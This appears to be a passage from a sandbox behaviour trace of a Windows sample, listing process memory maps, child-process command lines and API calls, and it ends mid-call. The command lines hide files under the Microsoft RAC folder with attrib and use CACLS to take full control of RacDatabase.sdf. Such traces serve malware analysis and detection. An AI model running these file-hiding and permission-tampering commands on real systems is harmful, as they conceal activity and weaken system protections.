id = 9455 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9456 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9457 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9458 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9459 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9460 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9461 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9462 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9463 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 9464 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9465 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 122 os_tid = 0xf68 Process: id = "70" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xf6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xf3c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9530 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9531 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9532 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9533 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 9534 start_va = 0x510000 end_va = 0x516fff entry_point = 0x510000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9535 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9536 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9537 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9538 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 9539 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9540 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9541 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9542 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9543 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 9544 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 9545 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9546 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9547 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9548 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9549 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9550 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9551 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9552 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9553 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9554 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9555 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9556 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9557 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 9558 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9559 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 123 os_tid = 0xf70 Process: id = "71" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xf3c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9560 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9561 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9562 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9563 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9564 start_va = 0x620000 end_va = 0x626fff entry_point = 0x620000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9565 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9566 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9567 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9568 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 9569 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9570 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9571 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9572 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9573 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 9574 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 9575 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9576 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9577 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9578 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9579 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9580 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9581 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9582 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9583 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9584 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9585 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9586 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9587 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9588 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9589 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 124 os_tid = 0xf78 Process: id = "72" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9871 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9872 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9873 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9874 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 9875 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9876 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9877 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9878 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9879 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9880 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9881 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9882 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9883 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9884 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 9885 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 9886 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9887 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9888 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9889 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9890 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9891 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9892 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9893 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9894 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9895 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 9896 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9897 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9898 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9899 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9900 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9901 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9902 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 9903 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9904 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 9905 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 128 os_tid = 0xf94 [0126.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd04 | out: lpSystemTimeAsFileTime=0x22fd04*(dwLowDateTime=0x855a66e0, dwHighDateTime=0x1d440a9)) [0126.534] GetCurrentProcessId () returned 0xf90 [0126.534] GetCurrentThreadId () returned 0xf94 [0126.534] GetTickCount () returned 0x28b2e [0126.534] QueryPerformanceCounter (in: lpPerformanceCount=0x22fcfc | out: lpPerformanceCount=0x22fcfc*=18332357047) returned 1 [0126.535] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0126.535] __set_app_type (_Type=0x1) [0126.535] __p__fmode () returned 0x76b331f4 [0126.535] __p__commode () returned 0x76b331fc [0126.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0126.535] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0126.536] GetCurrentThreadId () returned 0xf94 [0126.536] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf94) returned 0x38 [0126.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0126.536] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0126.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.536] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.536] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fc94 | out: phkResult=0x22fc94*=0x0) returned 0x2 [0126.536] VirtualQuery (in: lpAddress=0x22fccb, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0126.536] GetConsoleOutputCP () returned 0x1b5 [0126.536] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.537] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0126.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0126.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.537] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.537] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.537] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.538] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.538] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0126.538] GetEnvironmentStringsW () returned 0x360240* [0126.538] FreeEnvironmentStringsW (penv=0x360240) returned 1 [0126.538] GetEnvironmentStringsW () returned 0x360240* [0126.538] FreeEnvironmentStringsW (penv=0x360240) returned 1 [0126.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec04 | out: phkResult=0x22ec04*=0x40) returned 0x0 [0126.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0xf0, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x0, lpData=0x22ec10*=0x1, lpcbData=0x22ec08*=0x1000) returned 0x2 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x0, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x40, lpcbData=0x22ec08*=0x4) returned 0x0 [0126.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec0c, lpData=0x22ec10, lpcbData=0x22ec08*=0x1000 | out: lpType=0x22ec0c*=0x4, lpData=0x22ec10*=0x40, 